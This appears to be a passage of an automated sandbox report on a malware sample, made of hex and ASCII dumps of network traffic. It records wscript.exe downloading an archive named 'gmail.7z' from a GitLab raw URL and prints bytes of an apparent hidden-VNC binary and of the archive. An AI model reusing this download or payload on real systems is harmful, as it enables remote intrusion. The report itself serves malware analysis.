00 00 00 00 00 00 00 ff ff ff ff d0 5f 47 00 20
                                                                                                                  Data Ascii: WHVNC HWHx_G pWH_G WH_G WH_G_G WH_G
                                                                                                                  2023-08-03 15:59:55 UTC544INData Raw: 10 03 53 65 74 46 69 6c 65 50 6f 69 6e 74 65 72 00 00 83 00 44 65 76 69 63 65 49 6f 43 6f 6e 74 72 6f 6c 00 ab 02 52 65 61 64 46 69 6c 65 00 00 97 03 57 72 69 74 65 46 69 6c 65 00 05 03 53 65 74 45 6e 64 4f 66 46 69 6c 65 00 00 48 01 47 65 74 44 69 73 6b 46 72 65 65 53 70 61 63 65 57 00 3a 01 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 00 33 00 43 6f 6d 70 61 72 65 46 69 6c 65 54 69 6d 65 00 bc 00 46 69 6c 65 54 69 6d 65 54 6f 53 79 73 74 65 6d 54 69 6d 65 00 00 bb 00 46 69 6c 65 54 69 6d 65 54 6f 4c 6f 63 61 6c 46 69 6c 65 54 69 6d 65 00 99 01 47 65 74 50 72 6f 63 65 73 73 41 66 66 69 6e 69 74 79 4d 61 73 6b 00 00 bb 01 47 65 74 53 79 73 74 65 6d 49 6e 66 6f 00 fa 01 47 6c 6f 62 61 6c 4d 65 6d 6f 72 79 53 74 61 74 75 73 00 00 32 02 49 73 50 72 6f
                                                                                                                  Data Ascii: SetFilePointerDeviceIoControlReadFileWriteFileSetEndOfFileHGetDiskFreeSpaceW:GetCurrentProcess3CompareFileTimeFileTimeToSystemTimeFileTimeToLocalFileTimeGetProcessAffinityMaskGetSystemInfoGlobalMemoryStatus2IsPro
                                                                                                                  2023-08-03 15:59:55 UTC560INData Raw: 4c 3b 50 3b 54 3b 58 3b 5c 3b 60 3b 64 3b 68 3b 6c 3b 88 3b 8c 3b 90 3b 94 3b 98 3b 9c 3b a0 3b a4 3b a8 3b ac 3b 1c 3c 20 3c 24 3c 28 3c 2c 3c 30 3c 34 3c 38 3c 3c 3c 40 3c 44 3c 48 3c 4c 3c 50 3c 54 3c 58 3c 5c 3c 70 3c 74 3c 78 3c 7c 3c 80 3c 84 3c 88 3c a8 3c b0 3c b8 3c c0 3c c8 3c d0 3c 00 a0 07 00 5c 01 00 00 84 33 88 33 8c 33 90 33 94 33 98 33 9c 33 a0 33 a4 33 a8 33 ac 33 9c 35 a0 35 a4 35 a8 35 ac 35 b0 35 b4 35 b8 35 bc 35 c0 35 c4 35 c8 35 cc 35 d0 35 d4 35 d8 35 dc 35 e0 35 e4 35 e8 35 ec 35 f0 35 f4 35 f8 35 fc 35 00 36 04 36 08 36 0c 36 10 36 14 36 18 36 1c 36 20 36 24 36 28 36 2c 36 30 36 34 36 38 36 3c 36 40 36 44 36 48 36 4c 36 50 36 54 36 58 36 5c 36 60 36 64 36 68 36 6c 36 70 36 74 36 78 36 7c 36 80 36 bc 36 c0 36 c4 36 c8 36 cc 36 d0
                                                                                                                  Data Ascii: L;P;T;X;\;`;d;h;l;;;;;;;;;;;< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<p<t<x<|<<<<<<<<<<\33333333333555555555555555555555555566666666 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6666666


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  1192.168.2.749700172.65.251.78443C:\Windows\System32\wscript.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-08-03 15:59:56 UTC571OUTGET /cv1811930/cv/-/raw/main/gmail.7z?inline=false HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Accept-Language: en-us
                                                                                                                  UA-CPU: AMD64
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                  Host: gitlab.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2023-08-03 15:59:56 UTC571INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 03 Aug 2023 15:59:56 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 1960608
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                  Content-Disposition: attachment; filename="gmail.7z"; filename*=UTF-8''gmail.7z
                                                                                                                  2023-08-03 15:59:56 UTC572INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2d 63 6f 6d 70 75 74 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2d 63 6c 6f 75 64 62 69 6c 6c 69 6e 67 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2d 63 6c 6f 75 64 72 65 73 6f 75 72 63
                                                                                                                  Data Ascii: Content-Security-Policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://content.googleapis.com https://content-compute.googleapis.com https://content-cloudbilling.googleapis.com https://content-cloudresourc
                                                                                                                  2023-08-03 15:59:56 UTC574INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 6c 37 25 32 46 49 63 72 39 69 70 77 68 7a 65 25 32 42 76 4d 4c 59 36 6a 4a 70 75 49 63 59 44 74 51 70 46 58 30 79 54 50 38 53 43 76 57 61 7a 7a 38 58 51 35 6a 56 30 78 61 65 46 25 32 42 54 4e 33 38 72 47 31 35 61 4a 43 46 62 25 32 42 4d 50 47 64 53 79 35 36 53 30 67 6f 36 45 41 47 64 4c 34 35 25 32 46 4a 36 6a 44 6f 79 67 70 4f 6b 35 6e 38 52 70 61 6d 37 37 49 6f 35 41 72 4a 4c 6d 42 44 37 42 67 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                                                                                  Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l7%2FIcr9ipwhze%2BvMLY6jJpuIcYDtQpFX0yTP8SCvWazz8XQ5jV0xaeF%2BTN38rG15aJCFb%2BMPGdSy56S0go6EAGdL45%2FJ6jDoygpOk5n8Rpam77Io5ArJLmBD7Bg%3D"}],"group":"cf-nel","max_age":604800}N
                                                                                                                  2023-08-03 15:59:56 UTC575INData Raw: 37 7a bc af 27 1c 00 04 33 73 73 02 40 ea 1d 00 00 00 00 00 40 00 00 00 00 00 00 00 1e 04 ce b5 95 2f 10 97 5c 23 ab 7c db 6f d9 3c c5 6a 0e a7 83 4d d4 c7 4b ce 79 da a8 04 26 d8 16 78 a3 78 9b 9d c1 af 82 b5 7c 56 eb f2 04 c1 f6 36 44 a8 01 d6 6d 40 57 5b ba 0b 8e 91 b4 da da 9e 7e 6e cf fc 9a 8e 11 53 01 f2 48 74 21 99 6d 7c 63 c9 eb 06 33 13 71 bc 63 ae a8 c4 02 16 d0 fc a4 5e a6 00 51 fc c9 11 d9 77 67 36 a6 d4 3b 71 ee 8b 76 6f 15 68 bb 57 93 aa 2f 20 e8 54 b6 28 92 76 09 1d f7 29 eb 47 0c 8b 11 97 4e fe ef 13 04 5e 85 50 be 71 1f a5 d7 45 50 19 5a 27 60 37 32 66 90 c8 4a 02 9d c4 24 8f 2a 91 1b da 77 dc 02 04 b1 a3 1f 05 3d f4 86 2c 0f 1c 0b 49 18 3e 36 6c ec 0e 24 5f b0 19 15 cb 8c f9 e2 aa fe 34 c6 55 e9 64 4f 8c 70 a1 38 33 3d e2 d4 cf 64 a5 4d
                                                                                                                  Data Ascii: 7z'3ss@@/\#|o<jMKy&xx|V6Dm@W[~nSHt!m|c3qc^Qwg6;qvohW/ T(v)GN^PqEPZ'`72fJ$*w=,I>6l$_4UdOp83=dM
                                                                                                                  2023-08-03 15:59:56 UTC575INData Raw: 26 e4 16 84 0b 4a 42 62 5d 3e 90 0f d0 16 87 ff 9b bc cf a8 d0 33 d1 a1 15 16 76 c9 31 d1 7e 21 ce f4 18 a9 ba ee c9 ae b5 89 1b 80 94 81 24 e0 e8 8a 00 40 9b c2 b4 fb 52 1d 49 6b 55 34 50 da bb df de 08 c0 ff 74 4c 54 92 5c 27 31 a2 d8 8f 98 a9 fb e8 b0 bd fc 39 28 5d d8 8c 83 11 0d 71 46 2d c2 d9 fd 97 fc 12 17 13 6b 67 ff ef a4 4c a2 6d 18 f6 58 e9 8d 8d 6b ac 37 83 2f 98 55 57 ec 65 49 49 2e aa 42 53 2b 11 e9 88 05 85 78 11 5c 80 e4 3c 09 9a f4 ab d0 29 8a 5b f0 7e 0c 9f 3f 55 63 9b 17 07 de 16 4f 59 81 af 0d 6c d7 1b fb e5 33 14 f5 8d 3f 5b aa d8 37 60 8c 98 d4 18 e2 63 25 16 51 93 28 ac 0f b6 01 f0 71 7c 29 8a d5 61 a2 a0 66 39 c8 02 1e d1 99 52 ee e8 76 54 b5 2c 4a e3 58 ec 5b 4c 3c cc 1e 25 33 77 ed 84 fe 46 19 82 de 1b a7 5d 8c 33 92 f3 76 40 50
                                                                                                                  Data Ascii: &JBb]>3v1~!$@RIkU4PtLT\'19(]qF-kgLmXk7/UWeII.BS+x\<)[~?UcOYl3?[7`c%Q(q|)af9RvT,JX[L<%3wF]3v@P
                                                                                                                  2023-08-03 15:59:56 UTC577INData Raw: d6 fa 94 e4 22 1b bf bb 49 de 79 eb 14 ff 03 f9 33 67 10 de 7c ff a1 65 ae 0b 2a d2 d8 4c d8 a9 b6 aa 3a 30 53 8b f9 2e 6a 0a 88 95 b8 2d 7b 66 79 11 b3 77 d2 b5 d8 77 60 77 7d 2d a2 8a 4b 11 2b 01 0f 47 ca 65 7f 22 10 cc 35 e4 d9 05 75 5e 6e 61 48 e0 36 2f a8 5e a8 a8 ff 2f 00 c9 74 9a 98 b2 a2 03 4d fb ce cc 0a cb 22 97 2e c6 f7 a5 35 13 3d 57 c3 b2 ec 6d 61 fd 64 55 3d 82 9d db 40 fd 7c 1a 0b ba 76 44 c7 e7 1e 3f 84 1b 0c 76 15 73 f1 68 2c e8 cc de ef af a4 c5 b3 c9 29 8a db b3 64 fb 91 fd 6c 9a f2 20 07 82 3b 02 2f 7f 76 52 6e 4b 9e 3b 33 c4 09 af 48 5e 4c 35 00 15 fd 08 99 b9 d6 69 08 a8 09 fe 15 ac 1e 66 f1 30 51 f2 56 31 c8 63 aa a4 9d f3 0c 6c 99 3f e1 d9 be 38 b8 fa 3e a1 19 f9 17 60 cc 54 d4 90 ec 8c 6a 54 c3 82 6f 61 9e 5d 3e 47 9b 95 ca f2 37
                                                                                                                  Data Ascii: "Iy3g|e*L:0S.j-{fyww`w}-K+Ge"5u^naH6/^/tM".5=WmadU=@|vD?vsh,)dl ;/vRnK;3H^L5if0QV1cl?8>`TjToa]>G7
                                                                                                                  2023-08-03 15:59:56 UTC578INData Raw: 5e ad 9d b7 8a 5d 52 ea f2 42 d6 54 ad 74 01 68 ba 42 d6 9c bc 2e 5d d3 e4 24 c5 6b 83 69 97 1b d7 89 01 55 df d2 d7 1b f1 92 cd 1e e9 03 9e 62 57 69 45 71 eb 57 7c 8f 7d 1d 4f f1 85 df c4 5c e8 6a 47 10 b1 6f af 53 54 01 65 c0 84 3f a1 2e 77 8e 28 6a e3 c2 e1 9f 7f 63 a4 9e 4d 00 14 88 33 86 f1 da a4 f5 31 f0 ae 73 21 8b ab 16 61 2b 36 21 3c 8f 26 0a 6a 01 ae e1 92 15 51 20 05 fe 44 17 b5 3a 0d 77 aa 67 f0 af d2 2b 79 a2 d0 7c b0 9d 47 bd 45 a1 77 4f ec cf 90 c5 70 dd 66 20 f3 ad ad af 5e 3b 16 cd a7 61 65 de 37 f0 75 d6 62 87 27 a8 2a 0d 65 9d bf e8 4e 67 c5 a1 db cd d4 f6 a6 03 8e 2d 05 8e 6e b9 c2 14 25 4f a2 26 52 e0 a6 9b 7f 23 8c 2c 4e dd 6f e4 99 17 78 5f f8 a9 62 8a 4e 86 19 fe ff e1 eb 1c 36 d8 ab 89 09 92 84 76 aa 61 69 29 5f 28 19 a7 36 60 3e
                                                                                                                  Data Ascii: ^]RBTthB.]$kiUbWiEqW|}O\jGoSTe?.w(jcM31s!a+6!<&jQ D:wg+y|GEwOpf ^;ae7ub'*eNg-n%O&R#,Nox_bN6vai)_(6`>
                                                                                                                  2023-08-03 15:59:56 UTC579INData Raw: aa db f5 d0 a1 23 68 27 e2 b2 2f dd cb 37 c9 e5 f1 5a 23 93 5e 64 75 34 9e fd 64 cf e2 70 d4 34 49 3b 1c 2d a2 c5 6c f7 bf f3 dc 22 84 e4 7c a2 75 51 c4 3d e7 c9 ca df ba dc f4 3c 3e 0c 4f bd 8d 3f b1 25 6c 21 c6 6a b2 74 5f 4f a9 51 87 1b a5 bb aa 3c cb d6 29 6f d8 44 1b b9 65 1c b4 7b 13 15 53 b6 c7 f6 9e 13 57 6f b8 70 85 38 ff 4a 20 a2 15 c0 40 af 1f ef ec 93 ff 86 5c 94 cb 48 80 a4 4f da 99 25 2f 14 9e 59 0c 15 a4 d9 d6 51 95 62 95 76 f2 85 53 9b ba 9e 17 30 62 93 5e c6 71 d1 f3 b2 bb f9 a5 df 2d 4d 75 68 ed c7 91 43 52 19 1a db 9f 2c f7 69 dd bc 3f 90 1b fe 55 41 6b 01 f5 dc c1 59 dd a3 7f fb aa 87 19 c8 42 8a 19 7e d5 14 9a 9b 7e 12 79 99 2f e1 96 7a d5 03 91 0f 77 29 5c 0f 02 06 fc 2c 77 9b 4b 1d cf fa 82 87 00 28 5a fe db 7d 43 87 ae 90 de d7 58
                                                                                                                  Data Ascii: #h'/7Z#^du4dp4I;-l"|uQ=<>O?%l!jt_OQ<)oDe{SWop8J @\HO%/YQbvS0b^q-MuhCR,i?UAkYB~~y/zw)\,wK(Z}CX
                                                                                                                  2023-08-03 15:59:56 UTC581INData Raw: 4c b8 61 38 a6 a3 a6 fc dd 5a f6 b4 f0 57 09 58 6f 44 40 1e 71 41 59 fa b4 64 28 95 cd 9b aa 54 60 4c fb 16 d3 23 fe ac 6c 43 1a 19 f9 2a d2 42 cf ea 5c 83 a0 f1 e4 88 94 cc f0 1c 36 8a a3 c8 0c 3e 4d d4 40 ed 5d a3 f5 0a 78 63 c5 0b 65 f2 02 95 7c 8e bc af 21 c5 2e 79 92 4c 8f 5a 10 2b 16 29 e8 1f b8 80 61 43 49 e5 db 0f ab 8d 19 85 a5 85 39 c6 44 ce 94 3a 2f 81 1d 48 3f a9 b8 d2 ab ee b4 ba c9 55 49 02 4c ef 02 ff dc 64 0f d8 51 7f 67 0f bf 34 d6 5c b5 91 e9 5a 18 e4 12 03 07 48 79 80 95 d5 a6 ce ae 6c f1 7f b5 b1 72 d7 9b 28 b0 90 6d 1f af 1b 61 71 46 94 59 4b fe f1 a3 ac 96 57 02 35 fe 5d b1 17 5c eb ff 66 44 75 a2 59 a4 34 4d 6f 0a 09 50 39 6a a4 0d 34 f1 28 30 e1 e1 12 7c 62 9a f7 b3 01 49 c3 d9 a2 f9 a8 70 53 06 99 42 0e 6e 78 ce 5b 76 a2 20 1f 8c
                                                                                                                  Data Ascii: La8ZWXoD@qAYd(T`L#lC*B\6>M@]xce|!.yLZ+)aCI9D:/H?UILdQg4\ZHylr(maqFYKW5]\fDuY4MoP9j4(0|bIpSBnx[v
                                                                                                                  2023-08-03 15:59:56 UTC582INData Raw: af 91 6e 62 70 49 b2 c5 b7 9e f3 6c 3e 02 e7 49 9a fc 4f 01 c0 3e d1 68 f3 8e f5 21 56 68 01 32 61 01 f7 84 29 a4 a0 9c c2 cd 63 da b1 75 10 f3 a3 0c 27 03 43 92 25 f8 ae 05 e6 bc d0 5d 0a 3c 68 0f 8a 39 82 6c ce 23 15 72 16 7f 59 66 78 d5 0d eb 0c df 79 74 35 1c e4 0c a8 c6 d0 83 48 25 e7 46 32 a4 4a 58 a4 4f 6c 2e 91 d6 89 60 01 33 67 1d 41 f0 fd c3 51 c3 3a eb 60 89 37 eb 2c 32 3c b8 67 f0 fa d9 f6 c5 40 2a 91 95 81 73 d2 e5 01 50 ca 9e 24 5c ee 25 f7 10 63 d5 bd 07 4f 8f 84 72 22 5c e5 9e e8 2c a2 cf 1d 63 a4 d4 e0 af bd da ef 66 1b 5c 9d 96 c1 46 79 2b 67 e2 73 35 f2 ea 5a e4 a7 dd 73 ce 03 74 27 62 f9 5b ef 10 5b c4 43 2b 15 e9 95 c0 ee b9 f9 07 6b 26 31 59 82 e0 fd ae d7 3e 9c 4e dc 98 c1 b8 06 f9 a9 1c b7 7c 9a b9 e6 36 2a db e1 6e 75 ad e0 dc 50
                                                                                                                  Data Ascii: nbpIl>IO>h!Vh2a)cu'C%]<h9l#rYfxyt5H%F2JXOl.`3gAQ:`7,2<g@*sP$\%cOr"\,cf\Fy+gs5Zst'b[[C+k&1Y>N|6*nuP
                                                                                                                  2023-08-03 15:59:56 UTC583INData Raw: d6 1e 3a 0a f6 7d d2 14 c2 27 48 6a a5 18 e1 58 cc 4c 0f 28 da 9d 14 28 20 a7 ba 52 00 d7 22 ab 34 23 a0 e5 21 9b 43 b7 b8 1c 90 62 6e d6 c8 94 5e a6 f8 d6 92 32 4d b8 e5 e0 a2 b6 4b 57 02 0d 62 7c ad 86 9b c4 30 5b 57 01 ea 1a a0 92 54 63 db 02 5c b5 8a 00 9c 0d 47 85 ff 63 1e 30 ee fa 86 8c ed 85 a9 8e f4 13 79 6b 84 9e 69 8c 59 de e9 f9 78 f8 ce 90 96 cd 2e 0c 9c da a8 b5 30 99 e4 5b 9c 43 a7 a9 0f e2 06 e1 5a b3 8d 45 06 aa 7e d0 ff 1f 5a 77 b9 9c 1e 62 15 31 2b ba a3 40 8d e5 ef 9e 7b 1e d4 b7 cd 08 e2 13 d1 75 7e ae 89 48 b2 67 b9 8f 2c 9f fd a9 eb 4f 11 30 07 15 1a 60 1d ac b2 24 c8 bf 2f 4d 57 41 6e f7 09 41 71 0a ff 94 f0 85 13 19 11 b8 22 57 55 96 62 17 b0 c1 33 1c 9c ed 8a 7b 17 98 d0 dc 57 7c 21 be 6b a8 4b d2 18 9b 75 a4 d0 12 35 59 57 5c 10
                                                                                                                  Data Ascii: :}'HjXL(( R"4#!Cbn^2MKWb|0[WTc\Gc0ykiYx.0[CZE~Zwb1+@{u~Hg,O0`$/MWAnAq"WUb3{W|!kKu5YW\
                                                                                                                  2023-08-03 15:59:56 UTC585INData Raw: 4e 49 a2 ed ca 12 dc 89 cf f2 5c fa 84 5a fa 07 be 15 a0 65 4b 36 02 8f b8 64 2f df b6 54 91 6e 49 7e c6 bc 47 69 91 07 92 23 46 8a f4 bb 43 5b 29 73 57 de 99 d2 40 31 a5 ac c4 0f cc d8 23 e0 c7 e3 10 3d ac a7 7f 26 a8 90 bb ca f1 53 07 2a 29 c7 71 4e 38 8f 0b 1c 18 76 52 5f 43 85 8e ba e2 92 02 51 74 1b ad e3 e0 9a 11 0f 5a 1b b6 50 7e 81 3b 0f ce 29 ac e5 d3 a5 dd 27 f1 08 8e d1 52 96 0d 37 75 e9 b1 05 91 64 98 b0 ed e8 07 d4 60 81 84 bb 3f d7 c1 43 d8 50 9f bc 8b 51 68 3c cd 20 2d 79 8b a7 01 69 b4 7e f3 b1 23 cc 9c 56 3b bd 89 f9 07 bf 5b 52 79 34 42 c4 c1 7e 16 29 85 13 14 c5 7a 60 cb d9 be 09 28 f4 a1 11 a9 b3 ca 6c 14 4e d9 01 6e 64 c6 6d b5 89 24 75 ef 36 17 03 6c da 3d 49 79 53 3b 0f 80 65 90 41 a7 67 68 b2 b5 ee 68 53 c4 5f 64 70 fd e5 a2 4f 16
                                                                                                                  Data Ascii: NI\ZeK6d/TnI~Gi#FC[)sW@1#=&S*)qN8vR_CQtZP~;)'R7ud`?CPQh< -yi~#V;[Ry4B~)z`(lNndm$u6l=IyS;eAghhS_dpO
                                                                                                                  2023-08-03 15:59:56 UTC586INData Raw: 59 2a b1 1c 5d 24 dd d3 52 01 51 ed 08 f5 67 35 5f 54 ba 2e 6d 45 3e e6 c7 c7 8f cc 9d 57 2e d8 41 46 57 bb 0d b4 03 0b af 7f be 49 92 bf 3e 81 7e 4d 7c fb 00 52 67 f9 7c 1c 0b 8f b8 2e 85 84 42 4a 71 8b bf a4 5c 6a 16 14 82 7b f0 8e aa f8 e5 7a 53 17 f9 65 7d 7f 23 a5 9d 5c 5c 7b d5 75 cb 64 57 cd 5a 19 d6 b8 63 da 6d d9 7b 9e fa 18 dd 49 06 fb fb 9b 3d 6c ca fe 38 a3 5c 3f c4 16 b6 9f ce 3a 22 f7 e8 5e 87 2f c6 da ac 9e 8e d4 c9 19 0e 4c 65 93 37 61 ca 59 72 6b 49 69 01 17 3f 1b 09 68 b5 49 0a 13 c4 05 b9 bb ef 04 1b 61 16 92 08 f5 0b f2 29 54 68 4c 0b 38 2c 5e fd 40 f8 0f e7 e5 ee 36 9d 25 cf c3 d0 34 61 c7 d8 8d fd 67 ef ca 56 f4 68 19 ee 8d bd c8 54 ce ed 14 b7 ac f6 d0 28 3a a0 6d 20 c4 20 39 f1 9e 60 57 c3 84 e6 a5 a5 55 4b b6 5b 94 08 be 7c 43 3a
                                                                                                                  Data Ascii: Y*]$RQg5_T.mE>W.AFWI>~M|Rg|.BJq\j{zSe}#\\{udWZcm{I=l8\?:"^/Le7aYrkIi?hIa)ThL8,^@6%4agVhT(:m 9`WUK[|C:
                                                                                                                  2023-08-03 15:59:56 UTC587INData Raw: 88 66 24 03 a5 ae 12 11 20 e8 9e d8 54 0e ed 0c de 7f 4d c0 6e 82 13 04 fc f6 5f ba 50 9b a0 9e a4 5a 16 c1 ba 18 11 b5 8d e7 09 40 97 c5 16 14 f5 03 6d 5e 36 3f 30 06 18 a7 0a 2b b9 de e0 70 f8 3b 2e 2b ea a0 ab 58 56 7c 25 14 1b fc 2f 26 b9 41 09 0d 48 af c1 66 ae a1 73 41 5f 2e 12 f7 e3 94 a6 c5 7c f2 d4 ca 60 a4 d5 58 00 b6 02 54 16 94 dd 7b b0 f8 f7 a1 8e 5f 50 f2 f5 45 e8 ee cf 74 ab e4 8b 63 5e 3a d0 bb a4 5b e9 98 43 83 ad c2 84 9a cc 3b dd 0c b9 3e ae 99 32 44 1e e8 a2 8b e7 83 c3 a1 06 b2 8b 73 dc ce 59 7d de 91 54 d4 2b d8 3c 8c 9d 84 07 8b b4 fa b8 7b b3 fe b9 92 95 db e3 52 07 5a 9a a5 03 9a 12 b5 d6 a0 6f a8 09 c1 19 ee 60 a9 2a 85 67 75 6d 2e 8d 2b 78 7c ef b6 01 39 b7 74 ee 60 69 7a 05 55 fe 7f 4d 90 20 1b 28 3e 74 f0 29 91 aa ad eb 64 93
                                                                                                                  Data Ascii: f$ TMn_PZ@m^6?0+p;.+XV|%/&AHfsA_.|`XT{_PEtc^:[C;>2DsY}T+<{RZo`*gum.+x|9t`izUM (>t)d
                                                                                                                  2023-08-03 15:59:56 UTC589INData Raw: bc 8f 78 af b4 52 67 35 89 bb c6 14 22 1f dd 65 f3 e9 eb 15 e6 43 b5 aa 2a 81 75 24 d9 3b 8c 7a 3b af fb 05 77 ba 39 74 0f 81 5f 1a d2 e6 77 9f 48 71 08 d8 12 07 f5 03 d8 04 20 b2 be 80 47 b5 17 a5 ce 69 fa 85 ba af 5f 89 b5 21 65 81 20 c8 1f d4 d8 2a 84 47 6d 02 fa 9b 5f 6d d4 e1 b0 cc 66 23 09 8a f9 c3 1d 9d e3 4c 34 42 1b 61 80 ed 00 1d 86 a2 18 a0 36 eb fa 82 5d 76 22 90 92 b0 d0 16 ad b0 c9 57 3e 1a bf 9b d4 9a d9 fc f5 87 a5 3f 39 c6 e5 3f 48 fc 2d 9a a7 81 2c 6e 63 04 a7 27 64 e1 b5 bc 1b 60 4d 92 b0 90 c9 51 a0 80 f2 7c 85 7f ea 28 26 ed 84 a1 b6 ac bf 1c c0 d2 77 a2 32 67 17 f6 76 21 c2 1e c4 21 76 ac 8d 0c 5a 1c 6a 68 c9 af 68 c0 45 90 4a 05 34 eb e3 2f 0e 25 cc c8 41 8e e6 08 da fd b7 9c 1f 58 60 4a 56 94 2a 7f cd 6c b4 db 0c cd bc 66 fb 50 17
                                                                                                                  Data Ascii: xRg5"eC*u$;z;w9t_wHq Gi_!e *Gm_mf#L4Ba6]v"W>?9?H-,nc'd`MQ|(&w2gv!!vZjhhEJ4/%AX`JV*lfP
                                                                                                                  2023-08-03 15:59:56 UTC590INData Raw: c0 dc 36 4a 8a 5d 06 88 87 ff 40 fe 5b 5b 73 f7 f1 cf 9e 2d 85 40 40 26 f0 03 4e e4 49 6d 59 16 ca 63 f1 9a 0b 26 e7 4f 29 8c 49 35 e7 2e 39 9a a8 11 4b da 72 4b 44 83 b9 15 b9 c1 c0 90 ed 20 55 f4 44 d9 b0 ab d2 a2 52 bb d7 8c 5d 50 88 d0 75 e5 85 39 f9 cb 21 13 34 b4 82 8f a0 23 e1 95 48 6d a3 d2 7e bb 7b 81 92 9d 6d 1a fb ef fe 51 bb 28 26 a2 e2 44 d7 4f 27 90 6c 57 d0 9b f2 32 a5 bb 55 cd 1a 5f 82 eb 95 fd 8f f0 cd e1 3c 28 80 eb a3 8d f0 2a 4d 99 ac 34 0e 11 48 09 69 3f c0 05 bb e2 39 e2 ca 5d 68 1f b0 38 43 3d ae 80 ba 66 18 99 5a 2c 6d 82 65 14 af 70 e7 9a 25 21 5c 11 49 56 b8 68 17 bf ea f7 58 b3 a4 65 80 22 bc 5d 07 cb bd a9 77 1d ec dd e9 ec 26 a6 57 a8 4a 7c 19 98 52 53 3c 35 4a ef 8a 3b 2c 0b 12 75 d8 e5 3b 50 e2 bb 4f ce 6a eb 4f e8 a4 ad 68
                                                                                                                  Data Ascii: 6J]@[[s-@@&NImYc&O)I5.9KrKD UDR]Pu9!4#Hm~{mQ(&DO'lW2U_<(*M4Hi?9]h8C=fZ,mep%!\IVhXe"]w&WJ|RS<5J;,u;POjOh
                                                                                                                  2023-08-03 15:59:56 UTC591INData Raw: 19 44 fe 47 1c eb d0 52 28 81 9c fc 35 57 44 15 d3 29 99 3e 06 09 73 68 e5 b8 13 60 20 10 83 c7 6d db 75 72 2c cd 1b 3e 13 9a 28 ae 12 db ca 9f 57 0b 05 ed b0 74 83 3e 6b 48 03 0a 6b 14 c9 c2 57 01 7f 23 48 32 99 81 65 84 43 a3 0e 69 84 6d 04 85 c3 41 68 44 7f 09 2e 4c 28 86 6e da 05 3b 7a 33 df ff fb 85 b9 0a 52 50 46 16 2a f6 0a 8b 4c 7a 8e 96 38 8a 9b b4 2a b5 f2 65 ec 77 28 fa f2 f7 05 81 f4 65 10 0d 1c b8 9a af 48 20 8f 20 93 7c cd 1e 6f 69 cf 81 ba e4 f7 74 ba 4d 58 e0 80 f8 14 76 ce 0c 6f 5f af ad 82 fe e3 99 df 11 b5 ea f6 00 ca eb fe 75 60 dc a1 c6 b9 43 97 dd 8e 30 77 e8 fe 15 9d de 4b 0e cf a6 ae 9a e9 fb 1c e9 44 fe 92 b6 99 32 62 17 30 7f a0 ad da d5 3e 19 88 af aa d9 81 3e 13 0c 62 66 08 2a 73 61 97 2b 1d 8a 46 48 5a e5 21 24 03 e3 3a b4 92
                                                                                                                  Data Ascii: DGR(5WD)>sh` mur,>(Wt>kHkW#H2eCimAhD.L(n;z3RPF*Lz8*ew(eH |oitMXvo_u`C0wKD2b0>>bf*sa+FHZ!$:
